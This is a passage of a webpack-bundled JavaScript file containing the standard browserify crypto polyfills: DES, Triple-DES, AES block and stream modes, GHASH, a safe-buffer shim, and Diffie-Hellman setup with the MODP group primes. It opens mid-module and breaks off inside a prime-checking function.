function DES(options) {
  Cipher.call(this, options);

  var state = new DESState();
  this._desState = state;

  this.deriveKeys(state, options.key);
}
inherits(DES, Cipher);
module.exports = DES;

DES.create = function create(options) {
  return new DES(options);
};

var shiftTable = [
  1, 1, 2, 2, 2, 2, 2, 2,
  1, 2, 2, 2, 2, 2, 2, 1
];

DES.prototype.deriveKeys = function deriveKeys(state, key) {
  state.keys = new Array(16 * 2);

  assert.equal(key.length, this.blockSize, 'Invalid key length');

  var kL = utils.readUInt32BE(key, 0);
  var kR = utils.readUInt32BE(key, 4);

  utils.pc1(kL, kR, state.tmp, 0);
  kL = state.tmp[0];
  kR = state.tmp[1];
  for (var i = 0; i < state.keys.length; i += 2) {
    var shift = shiftTable[i >>> 1];
    kL = utils.r28shl(kL, shift);
    kR = utils.r28shl(kR, shift);
    utils.pc2(kL, kR, state.keys, i);
  }
};

DES.prototype._update = function _update(inp, inOff, out, outOff) {
  var state = this._desState;

  var l = utils.readUInt32BE(inp, inOff);
  var r = utils.readUInt32BE(inp, inOff + 4);

  // Initial Permutation
  utils.ip(l, r, state.tmp, 0);
  l = state.tmp[0];
  r = state.tmp[1];

  if (this.type === 'encrypt')
    this._encrypt(state, l, r, state.tmp, 0);
  else
    this._decrypt(state, l, r, state.tmp, 0);

  l = state.tmp[0];
  r = state.tmp[1];

  utils.writeUInt32BE(out, l, outOff);
  utils.writeUInt32BE(out, r, outOff + 4);
};

DES.prototype._pad = function _pad(buffer, off) {
  var value = buffer.length - off;
  for (var i = off; i < buffer.length; i++)
    buffer[i] = value;

  return true;
};

DES.prototype._unpad = function _unpad(buffer) {
  var pad = buffer[buffer.length - 1];
  for (var i = buffer.length - pad; i < buffer.length; i++)
    assert.equal(buffer[i], pad);

  return buffer.slice(0, buffer.length - pad);
};

DES.prototype._encrypt = function _encrypt(state, lStart, rStart, out, off) {
  var l = lStart;
  var r = rStart;

  // Apply f() x16 times
  for (var i = 0; i < state.keys.length; i += 2) {
    var keyL = state.keys[i];
    var keyR = state.keys[i + 1];

    // f(r, k)
    utils.expand(r, state.tmp, 0);

    keyL ^= state.tmp[0];
    keyR ^= state.tmp[1];
    var s = utils.substitute(keyL, keyR);
    var f = utils.permute(s);

    var t = r;
    r = (l ^ f) >>> 0;
    l = t;
  }

  // Reverse Initial Permutation
  utils.rip(r, l, out, off);
};

DES.prototype._decrypt = function _decrypt(state, lStart, rStart, out, off) {
  var l = rStart;
  var r = lStart;

  // Apply f() x16 times
  for (var i = state.keys.length - 2; i >= 0; i -= 2) {
    var keyL = state.keys[i];
    var keyR = state.keys[i + 1];

    // f(r, k)
    utils.expand(l, state.tmp, 0);

    keyL ^= state.tmp[0];
    keyR ^= state.tmp[1];
    var s = utils.substitute(keyL, keyR);
    var f = utils.permute(s);

    var t = l;
    l = (r ^ f) >>> 0;
    r = t;
  }

  // Reverse Initial Permutation
  utils.rip(l, r, out, off);
};


/***/ }),
/* 2685 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var assert = __webpack_require__(124);
var inherits = __webpack_require__(25);

var proto = {};

function CBCState(iv) {
  assert.equal(iv.length, 8, 'Invalid IV length');

  this.iv = new Array(8);
  for (var i = 0; i < this.iv.length; i++)
    this.iv[i] = iv[i];
}

function instantiate(Base) {
  function CBC(options) {
    Base.call(this, options);
    this._cbcInit();
  }
  inherits(CBC, Base);

  var keys = Object.keys(proto);
  for (var i = 0; i < keys.length; i++) {
    var key = keys[i];
    CBC.prototype[key] = proto[key];
  }

  CBC.create = function create(options) {
    return new CBC(options);
  };

  return CBC;
}

exports.instantiate = instantiate;

proto._cbcInit = function _cbcInit() {
  var state = new CBCState(this.options.iv);
  this._cbcState = state;
};

proto._update = function _update(inp, inOff, out, outOff) {
  var state = this._cbcState;
  var superProto = this.constructor.super_.prototype;

  var iv = state.iv;
  if (this.type === 'encrypt') {
    for (var i = 0; i < this.blockSize; i++)
      iv[i] ^= inp[inOff + i];

    superProto._update.call(this, iv, 0, out, outOff);

    for (var i = 0; i < this.blockSize; i++)
      iv[i] = out[outOff + i];
  } else {
    superProto._update.call(this, inp, inOff, out, outOff);

    for (var i = 0; i < this.blockSize; i++)
      out[outOff + i] ^= iv[i];

    for (var i = 0; i < this.blockSize; i++)
      iv[i] = inp[inOff + i];
  }
};


/***/ }),
/* 2686 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var assert = __webpack_require__(124);
var inherits = __webpack_require__(25);

var des = __webpack_require__(691);
var Cipher = des.Cipher;
var DES = des.DES;

function EDEState(type, key) {
  assert.equal(key.length, 24, 'Invalid key length');

  var k1 = key.slice(0, 8);
  var k2 = key.slice(8, 16);
  var k3 = key.slice(16, 24);

  if (type === 'encrypt') {
    this.ciphers = [
      DES.create({ type: 'encrypt', key: k1 }),
      DES.create({ type: 'decrypt', key: k2 }),
      DES.create({ type: 'encrypt', key: k3 })
    ];
  } else {
    this.ciphers = [
      DES.create({ type: 'decrypt', key: k3 }),
      DES.create({ type: 'encrypt', key: k2 }),
      DES.create({ type: 'decrypt', key: k1 })
    ];
  }
}

function EDE(options) {
  Cipher.call(this, options);

  var state = new EDEState(this.type, this.options.key);
  this._edeState = state;
}
inherits(EDE, Cipher);

module.exports = EDE;

EDE.create = function create(options) {
  return new EDE(options);
};

EDE.prototype._update = function _update(inp, inOff, out, outOff) {
  var state = this._edeState;

  state.ciphers[0]._update(inp, inOff, out, outOff);
  state.ciphers[1]._update(out, outOff, out, outOff);
  state.ciphers[2]._update(out, outOff, out, outOff);
};

EDE.prototype._pad = DES.prototype._pad;
EDE.prototype._unpad = DES.prototype._unpad;


/***/ }),
/* 2687 */
/***/ (function(module, exports, __webpack_require__) {

var MODES = __webpack_require__(693)
var AuthCipher = __webpack_require__(1251)
var Buffer = __webpack_require__(41).Buffer
var StreamCipher = __webpack_require__(1252)
var Transform = __webpack_require__(201)
var aes = __webpack_require__(488)
var ebtk = __webpack_require__(489)
var inherits = __webpack_require__(25)

function Cipher (mode, key, iv) {
  Transform.call(this)

  this._cache = new Splitter()
  this._cipher = new aes.AES(key)
  this._prev = Buffer.from(iv)
  this._mode = mode
  this._autopadding = true
}

inherits(Cipher, Transform)

Cipher.prototype._update = function (data) {
  this._cache.add(data)
  var chunk
  var thing
  var out = []

  while ((chunk = this._cache.get())) {
    thing = this._mode.encrypt(this, chunk)
    out.push(thing)
  }

  return Buffer.concat(out)
}

var PADDING = Buffer.alloc(16, 0x10)

Cipher.prototype._final = function () {
  var chunk = this._cache.flush()
  if (this._autopadding) {
    chunk = this._mode.encrypt(this, chunk)
    this._cipher.scrub()
    return chunk
  }

  if (!chunk.equals(PADDING)) {
    this._cipher.scrub()
    throw new Error('data not multiple of block length')
  }
}

Cipher.prototype.setAutoPadding = function (setTo) {
  this._autopadding = !!setTo
  return this
}

function Splitter () {
  this.cache = Buffer.allocUnsafe(0)
}

Splitter.prototype.add = function (data) {
  this.cache = Buffer.concat([this.cache, data])
}

Splitter.prototype.get = function () {
  if (this.cache.length > 15) {
    var out = this.cache.slice(0, 16)
    this.cache = this.cache.slice(16)
    return out
  }
  return null
}

Splitter.prototype.flush = function () {
  var len = 16 - this.cache.length
  var padBuff = Buffer.allocUnsafe(len)

  var i = -1
  while (++i < len) {
    padBuff.writeUInt8(len, i)
  }

  return Buffer.concat([this.cache, padBuff])
}

function createCipheriv (suite, password, iv) {
  var config = MODES[suite.toLowerCase()]
  if (!config) throw new TypeError('invalid suite type')

  if (typeof password === 'string') password = Buffer.from(password)
  if (password.length !== config.key / 8) throw new TypeError('invalid key length ' + password.length)

  if (typeof iv === 'string') iv = Buffer.from(iv)
  if (config.mode !== 'GCM' && iv.length !== config.iv) throw new TypeError('invalid iv length ' + iv.length)

  if (config.type === 'stream') {
    return new StreamCipher(config.module, password, iv)
  } else if (config.type === 'auth') {
    return new AuthCipher(config.module, password, iv)
  }

  return new Cipher(config.module, password, iv)
}

function createCipher (suite, password) {
  var config = MODES[suite.toLowerCase()]
  if (!config) throw new TypeError('invalid suite type')

  var keys = ebtk(password, false, config.key, config.iv)
  return createCipheriv(suite, keys.key, keys.iv)
}

exports.createCipheriv = createCipheriv
exports.createCipher = createCipher


/***/ }),
/* 2688 */
/***/ (function(module, exports) {

exports.encrypt = function (self, block) {
  return self._cipher.encryptBlock(block)
}

exports.decrypt = function (self, block) {
  return self._cipher.decryptBlock(block)
}


/***/ }),
/* 2689 */
/***/ (function(module, exports, __webpack_require__) {

var xor = __webpack_require__(349)

exports.encrypt = function (self, block) {
  var data = xor(block, self._prev)

  self._prev = self._cipher.encryptBlock(data)
  return self._prev
}

exports.decrypt = function (self, block) {
  var pad = self._prev

  self._prev = block
  var out = self._cipher.decryptBlock(block)

  return xor(out, pad)
}


/***/ }),
/* 2690 */
/***/ (function(module, exports, __webpack_require__) {

var Buffer = __webpack_require__(41).Buffer
var xor = __webpack_require__(349)

function encryptStart (self, data, decrypt) {
  var len = data.length
  var out = xor(data, self._cache)
  self._cache = self._cache.slice(len)
  self._prev = Buffer.concat([self._prev, decrypt ? data : out])
  return out
}

exports.encrypt = function (self, data, decrypt) {
  var out = Buffer.allocUnsafe(0)
  var len

  while (data.length) {
    if (self._cache.length === 0) {
      self._cache = self._cipher.encryptBlock(self._prev)
      self._prev = Buffer.allocUnsafe(0)
    }

    if (self._cache.length <= data.length) {
      len = self._cache.length
      out = Buffer.concat([out, encryptStart(self, data.slice(0, len), decrypt)])
      data = data.slice(len)
    } else {
      out = Buffer.concat([out, encryptStart(self, data, decrypt)])
      break
    }
  }

  return out
}


/***/ }),
/* 2691 */
/***/ (function(module, exports, __webpack_require__) {

var Buffer = __webpack_require__(41).Buffer

function encryptByte (self, byteParam, decrypt) {
  var pad = self._cipher.encryptBlock(self._prev)
  var out = pad[0] ^ byteParam

  self._prev = Buffer.concat([
    self._prev.slice(1),
    Buffer.from([decrypt ? byteParam : out])
  ])

  return out
}

exports.encrypt = function (self, chunk, decrypt) {
  var len = chunk.length
  var out = Buffer.allocUnsafe(len)
  var i = -1

  while (++i < len) {
    out[i] = encryptByte(self, chunk[i], decrypt)
  }

  return out
}


/***/ }),
/* 2692 */
/***/ (function(module, exports, __webpack_require__) {

var Buffer = __webpack_require__(41).Buffer

function encryptByte (self, byteParam, decrypt) {
  var pad
  var i = -1
  var len = 8
  var out = 0
  var bit, value
  while (++i < len) {
    pad = self._cipher.encryptBlock(self._prev)
    bit = (byteParam & (1 << (7 - i))) ? 0x80 : 0
    value = pad[0] ^ bit
    out += ((value & 0x80) >> (i % 8))
    self._prev = shiftIn(self._prev, decrypt ? bit : value)
  }
  return out
}

function shiftIn (buffer, value) {
  var len = buffer.length
  var i = -1
  var out = Buffer.allocUnsafe(buffer.length)
  buffer = Buffer.concat([buffer, Buffer.from([value])])

  while (++i < len) {
    out[i] = buffer[i] << 1 | buffer[i + 1] >> (7)
  }

  return out
}

exports.encrypt = function (self, chunk, decrypt) {
  var len = chunk.length
  var out = Buffer.allocUnsafe(len)
  var i = -1

  while (++i < len) {
    out[i] = encryptByte(self, chunk[i], decrypt)
  }

  return out
}


/***/ }),
/* 2693 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var xor = __webpack_require__(349)

function getBlock (self) {
  self._prev = self._cipher.encryptBlock(self._prev)
  return self._prev
}

exports.encrypt = function (self, chunk) {
  while (self._cache.length < chunk.length) {
    self._cache = Buffer.concat([self._cache, getBlock(self)])
  }

  var pad = self._cache.slice(0, chunk.length)
  self._cache = self._cache.slice(chunk.length)
  return xor(chunk, pad)
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2694 */
/***/ (function(module, exports, __webpack_require__) {

var Buffer = __webpack_require__(41).Buffer
var ZEROES = Buffer.alloc(16, 0)

function toArray (buf) {
  return [
    buf.readUInt32BE(0),
    buf.readUInt32BE(4),
    buf.readUInt32BE(8),
    buf.readUInt32BE(12)
  ]
}

function fromArray (out) {
  var buf = Buffer.allocUnsafe(16)
  buf.writeUInt32BE(out[0] >>> 0, 0)
  buf.writeUInt32BE(out[1] >>> 0, 4)
  buf.writeUInt32BE(out[2] >>> 0, 8)
  buf.writeUInt32BE(out[3] >>> 0, 12)
  return buf
}

function GHASH (key) {
  this.h = key
  this.state = Buffer.alloc(16, 0)
  this.cache = Buffer.allocUnsafe(0)
}

// from http://bitwiseshiftleft.github.io/sjcl/doc/symbols/src/core_gcm.js.html
// by Juho Vähä-Herttua
GHASH.prototype.ghash = function (block) {
  var i = -1
  while (++i < block.length) {
    this.state[i] ^= block[i]
  }
  this._multiply()
}

GHASH.prototype._multiply = function () {
  var Vi = toArray(this.h)
  var Zi = [0, 0, 0, 0]
  var j, xi, lsbVi
  var i = -1
  while (++i < 128) {
    xi = (this.state[~~(i / 8)] & (1 << (7 - (i % 8)))) !== 0
    if (xi) {
      // Z_i+1 = Z_i ^ V_i
      Zi[0] ^= Vi[0]
      Zi[1] ^= Vi[1]
      Zi[2] ^= Vi[2]
      Zi[3] ^= Vi[3]
    }

    // Store the value of LSB(V_i)
    lsbVi = (Vi[3] & 1) !== 0

    // V_i+1 = V_i >> 1
    for (j = 3; j > 0; j--) {
      Vi[j] = (Vi[j] >>> 1) | ((Vi[j - 1] & 1) << 31)
    }
    Vi[0] = Vi[0] >>> 1

    // If LSB(V_i) is 1, V_i+1 = (V_i >> 1) ^ R
    if (lsbVi) {
      Vi[0] = Vi[0] ^ (0xe1 << 24)
    }
  }
  this.state = fromArray(Zi)
}

GHASH.prototype.update = function (buf) {
  this.cache = Buffer.concat([this.cache, buf])
  var chunk
  while (this.cache.length >= 16) {
    chunk = this.cache.slice(0, 16)
    this.cache = this.cache.slice(16)
    this.ghash(chunk)
  }
}

GHASH.prototype.final = function (abl, bl) {
  if (this.cache.length) {
    this.ghash(Buffer.concat([this.cache, ZEROES], 16))
  }

  this.ghash(fromArray([0, abl, 0, bl]))
  return this.state
}

module.exports = GHASH


/***/ }),
/* 2695 */
/***/ (function(module, exports, __webpack_require__) {

/* eslint-disable node/no-deprecated-api */
var buffer = __webpack_require__(43)
var Buffer = buffer.Buffer

// alternative to using Object.keys for old browsers
function copyProps (src, dst) {
  for (var key in src) {
    dst[key] = src[key]
  }
}
if (Buffer.from && Buffer.alloc && Buffer.allocUnsafe && Buffer.allocUnsafeSlow) {
  module.exports = buffer
} else {
  // Copy properties from require('buffer')
  copyProps(buffer, exports)
  exports.Buffer = SafeBuffer
}

function SafeBuffer (arg, encodingOrOffset, length) {
  return Buffer(arg, encodingOrOffset, length)
}

// Copy static methods from Buffer
copyProps(Buffer, SafeBuffer)

SafeBuffer.from = function (arg, encodingOrOffset, length) {
  if (typeof arg === 'number') {
    throw new TypeError('Argument must not be a number')
  }
  return Buffer(arg, encodingOrOffset, length)
}

SafeBuffer.alloc = function (size, fill, encoding) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  var buf = Buffer(size)
  if (fill !== undefined) {
    if (typeof encoding === 'string') {
      buf.fill(fill, encoding)
    } else {
      buf.fill(fill)
    }
  } else {
    buf.fill(0)
  }
  return buf
}

SafeBuffer.allocUnsafe = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return Buffer(size)
}

SafeBuffer.allocUnsafeSlow = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return buffer.SlowBuffer(size)
}


/***/ }),
/* 2696 */
/***/ (function(module, exports, __webpack_require__) {

var AuthCipher = __webpack_require__(1251)
var Buffer = __webpack_require__(41).Buffer
var MODES = __webpack_require__(693)
var StreamCipher = __webpack_require__(1252)
var Transform = __webpack_require__(201)
var aes = __webpack_require__(488)
var ebtk = __webpack_require__(489)
var inherits = __webpack_require__(25)

function Decipher (mode, key, iv) {
  Transform.call(this)

  this._cache = new Splitter()
  this._last = void 0
  this._cipher = new aes.AES(key)
  this._prev = Buffer.from(iv)
  this._mode = mode
  this._autopadding = true
}

inherits(Decipher, Transform)

Decipher.prototype._update = function (data) {
  this._cache.add(data)
  var chunk
  var thing
  var out = []
  while ((chunk = this._cache.get(this._autopadding))) {
    thing = this._mode.decrypt(this, chunk)
    out.push(thing)
  }
  return Buffer.concat(out)
}

Decipher.prototype._final = function () {
  var chunk = this._cache.flush()
  if (this._autopadding) {
    return unpad(this._mode.decrypt(this, chunk))
  } else if (chunk) {
    throw new Error('data not multiple of block length')
  }
}

Decipher.prototype.setAutoPadding = function (setTo) {
  this._autopadding = !!setTo
  return this
}

function Splitter () {
  this.cache = Buffer.allocUnsafe(0)
}

Splitter.prototype.add = function (data) {
  this.cache = Buffer.concat([this.cache, data])
}

Splitter.prototype.get = function (autoPadding) {
  var out
  if (autoPadding) {
    if (this.cache.length > 16) {
      out = this.cache.slice(0, 16)
      this.cache = this.cache.slice(16)
      return out
    }
  } else {
    if (this.cache.length >= 16) {
      out = this.cache.slice(0, 16)
      this.cache = this.cache.slice(16)
      return out
    }
  }

  return null
}

Splitter.prototype.flush = function () {
  if (this.cache.length) return this.cache
}

function unpad (last) {
  var padded = last[15]
  if (padded < 1 || padded > 16) {
    throw new Error('unable to decrypt data')
  }
  var i = -1
  while (++i < padded) {
    if (last[(i + (16 - padded))] !== padded) {
      throw new Error('unable to decrypt data')
    }
  }
  if (padded === 16) return

  return last.slice(0, 16 - padded)
}

function createDecipheriv (suite, password, iv) {
  var config = MODES[suite.toLowerCase()]
  if (!config) throw new TypeError('invalid suite type')

  if (typeof iv === 'string') iv = Buffer.from(iv)
  if (config.mode !== 'GCM' && iv.length !== config.iv) throw new TypeError('invalid iv length ' + iv.length)

  if (typeof password === 'string') password = Buffer.from(password)
  if (password.length !== config.key / 8) throw new TypeError('invalid key length ' + password.length)

  if (config.type === 'stream') {
    return new StreamCipher(config.module, password, iv, true)
  } else if (config.type === 'auth') {
    return new AuthCipher(config.module, password, iv, true)
  }

  return new Decipher(config.module, password, iv)
}

function createDecipher (suite, password) {
  var config = MODES[suite.toLowerCase()]
  if (!config) throw new TypeError('invalid suite type')

  var keys = ebtk(password, false, config.key, config.iv)
  return createDecipheriv(suite, keys.key, keys.iv)
}

exports.createDecipher = createDecipher
exports.createDecipheriv = createDecipheriv


/***/ }),
/* 2697 */
/***/ (function(module, exports) {

exports['des-ecb'] = {
  key: 8,
  iv: 0
}
exports['des-cbc'] = exports.des = {
  key: 8,
  iv: 8
}
exports['des-ede3-cbc'] = exports.des3 = {
  key: 24,
  iv: 8
}
exports['des-ede3'] = {
  key: 24,
  iv: 0
}
exports['des-ede-cbc'] = {
  key: 16,
  iv: 8
}
exports['des-ede'] = {
  key: 16,
  iv: 0
}


/***/ }),
/* 2698 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var generatePrime = __webpack_require__(1253)
var primes = __webpack_require__(2701)

var DH = __webpack_require__(2702)

function getDiffieHellman (mod) {
  var prime = new Buffer(primes[mod].prime, 'hex')
  var gen = new Buffer(primes[mod].gen, 'hex')

  return new DH(prime, gen)
}

var ENCODINGS = {
  'binary': true, 'hex': true, 'base64': true
}

function createDiffieHellman (prime, enc, generator, genc) {
  if (Buffer.isBuffer(enc) || ENCODINGS[enc] === undefined) {
    return createDiffieHellman(prime, 'binary', enc, generator)
  }

  enc = enc || 'binary'
  genc = genc || 'binary'
  generator = generator || new Buffer([2])

  if (!Buffer.isBuffer(generator)) {
    generator = new Buffer(generator, genc)
  }

  if (typeof prime === 'number') {
    return new DH(generatePrime(prime, generator), generator, true)
  }

  if (!Buffer.isBuffer(prime)) {
    prime = new Buffer(prime, enc)
  }

  return new DH(prime, generator, true)
}

exports.DiffieHellmanGroup = exports.createDiffieHellmanGroup = exports.getDiffieHellman = getDiffieHellman
exports.createDiffieHellman = exports.DiffieHellman = createDiffieHellman

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2699 */,
/* 2700 */,
/* 2701 */
/***/ (function(module, exports) {

module.exports = {"modp1":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a63a3620ffffffffffffffff"},"modp2":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece65381ffffffffffffffff"},"modp5":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca237327ffffffffffffffff"},"modp14":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca18217c32905e462e36ce3be39e772c180e86039b2783a2ec07a28fb5c55df06f4c52c9de2bcbf6955817183995497cea956ae515d2261898fa051015728e5a8aacaa68ffffffffffffffff"},"modp15":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca18217c32905e462e36ce3be39e772c180e86039b2783a2ec07a28fb5c55df06f4c52c9de2bcbf6955817183995497cea956ae515d2261898fa051015728e5a8aaac42dad33170d04507a33a85521abdf1cba64ecfb850458dbef0a8aea71575d060c7db3970f85a6e1e4c7abf5ae8cdb0933d71e8c94e04a25619dcee3d2261ad2ee6bf12ffa06d98a0864d87602733ec86a64521f2b18177b200cbbe117577a615d6c770988c0bad946e208e24fa074e5ab3143db5bfce0fd108e4b82d120a93ad2caffffffffffffffff"},"modp16":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca18217c32905e462e36ce3be39e772c180e86039b2783a2ec07a28fb5c55df06f4c52c9de2bcbf6955817183995497cea956ae515d2261898fa051015728e5a8aaac42dad33170d04507a33a85521abdf1cba64ecfb850458dbef0a8aea71575d060c7db3970f85a6e1e4c7abf5ae8cdb0933d71e8c94e04a25619dcee3d2261ad2ee6bf12ffa06d98a0864d87602733ec86a64521f2b18177b200cbbe117577a615d6c770988c0bad946e208e24fa074e5ab3143db5bfce0fd108e4b82d120a92108011a723c12a787e6d788719a10bdba5b2699c327186af4e23c1a946834b6150bda2583e9ca2ad44ce8dbbbc2db04de8ef92e8efc141fbecaa6287c59474e6bc05d99b2964fa090c3a2233ba186515be7ed1f612970cee2d7afb81bdd762170481cd0069127d5b05aa993b4ea988d8fddc186ffb7dc90a6c08f4df435c934063199ffffffffffffffff"},"modp17":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca18217c32905e462e36ce3be39e772c180e86039b2783a2ec07a28fb5c55df06f4c52c9de2bcbf6955817183995497cea956ae515d2261898fa051015728e5a8aaac42dad33170d04507a33a85521abdf1cba64ecfb850458dbef0a8aea71575d060c7db3970f85a6e1e4c7abf5ae8cdb0933d71e8c94e04a25619dcee3d2261ad2ee6bf12ffa06d98a0864d87602733ec86a64521f2b18177b200cbbe117577a615d6c770988c0bad946e208e24fa074e5ab3143db5bfce0fd108e4b82d120a92108011a723c12a787e6d788719a10bdba5b2699c327186af4e23c1a946834b6150bda2583e9ca2ad44ce8dbbbc2db04de8ef92e8efc141fbecaa6287c59474e6bc05d99b2964fa090c3a2233ba186515be7ed1f612970cee2d7afb81bdd762170481cd0069127d5b05aa993b4ea988d8fddc186ffb7dc90a6c08f4df435c93402849236c3fab4d27c7026c1d4dcb2602646dec9751e763dba37bdf8ff9406ad9e530ee5db382f413001aeb06a53ed9027d831179727b0865a8918da3edbebcf9b14ed44ce6cbaced4bb1bdb7f1447e6cc254b332051512bd7af426fb8f401378cd2bf5983ca01c64b92ecf032ea15d1721d03f482d7ce6e74fef6d55e702f46980c82b5a84031900b1c9e59e7c97fbec7e8f323a97a7e36cc88be0f1d45b7ff585ac54bd407b22b4154aacc8f6d7ebf48e1d814cc5ed20f8037e0a79715eef29be32806a1d58bb7c5da76f550aa3d8a1fbff0eb19ccb1a313d55cda56c9ec2ef29632387fe8d76e3c0468043e8f663f4860ee12bf2d5b0b7474d6e694f91e6dcc4024ffffffffffffffff"},"modp18":{"gen":"02","prime":"ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca18217c32905e462e36ce3be39e772c180e86039b2783a2ec07a28fb5c55df06f4c52c9de2bcbf6955817183995497cea956ae515d2261898fa051015728e5a8aaac42dad33170d04507a33a85521abdf1cba64ecfb850458dbef0a8aea71575d060c7db3970f85a6e1e4c7abf5ae8cdb0933d71e8c94e04a25619dcee3d2261ad2ee6bf12ffa06d98a0864d87602733ec86a64521f2b18177b200cbbe117577a615d6c770988c0bad946e208e24fa074e5ab3143db5bfce0fd108e4b82d120a92108011a723c12a787e6d788719a10bdba5b2699c327186af4e23c1a946834b6150bda2583e9ca2ad44ce8dbbbc2db04de8ef92e8efc141fbecaa6287c59474e6bc05d99b2964fa090c3a2233ba186515be7ed1f612970cee2d7afb81bdd762170481cd0069127d5b05aa993b4ea988d8fddc186ffb7dc90a6c08f4df435c93402849236c3fab4d27c7026c1d4dcb2602646dec9751e763dba37bdf8ff9406ad9e530ee5db382f413001aeb06a53ed9027d831179727b0865a8918da3edbebcf9b14ed44ce6cbaced4bb1bdb7f1447e6cc254b332051512bd7af426fb8f401378cd2bf5983ca01c64b92ecf032ea15d1721d03f482d7ce6e74fef6d55e702f46980c82b5a84031900b1c9e59e7c97fbec7e8f323a97a7e36cc88be0f1d45b7ff585ac54bd407b22b4154aacc8f6d7ebf48e1d814cc5ed20f8037e0a79715eef29be32806a1d58bb7c5da76f550aa3d8a1fbff0eb19ccb1a313d55cda56c9ec2ef29632387fe8d76e3c0468043e8f663f4860ee12bf2d5b0b7474d6e694f91e6dbe115974a3926f12fee5e438777cb6a932df8cd8bec4d073b931ba3bc832b68d9dd300741fa7bf8afc47ed2576f6936ba424663aab639c5ae4f5683423b4742bf1c978238f16cbe39d652de3fdb8befc848ad922222e04a4037c0713eb57a81a23f0c73473fc646cea306b4bcbc8862f8385ddfa9d4b7fa2c087e879683303ed5bdd3a062b3cf5b3a278a66d2a13f83f44f82ddf310ee074ab6a364597e899a0255dc164f31cc50846851df9ab48195ded7ea1b1d510bd7ee74d73faf36bc31ecfa268359046f4eb879f924009438b481c6cd7889a002ed5ee382bc9190da6fc026e479558e4475677e9aa9e3050e2765694dfc81f56e880b96e7160c980dd98edd3dfffffffffffffffff"}}

/***/ }),
/* 2702 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var BN = __webpack_require__(63);
var MillerRabin = __webpack_require__(1254);
var millerRabin = new MillerRabin();
var TWENTYFOUR = new BN(24);
var ELEVEN = new BN(11);
var TEN = new BN(10);
var THREE = new BN(3);
var SEVEN = new BN(7);
var primes = __webpack_require__(1253);
var randomBytes = __webpack_require__(274);
module.exports = DH;

function setPublicKey(pub, enc) {
  enc = enc || 'utf8';
  if (!Buffer.isBuffer(pub)) {
    pub = new Buffer(pub, enc);
  }
  this._pub = new BN(pub);
  return this;
}

function setPrivateKey(priv, enc) {
  enc = enc || 'utf8';
  if (!Buffer.isBuffer(priv)) {
    priv = new Buffer(priv, enc);
  }
  this._priv = new BN(priv);
  return this;
}

var primeCache = {};
function checkPrime(prime, generator) {
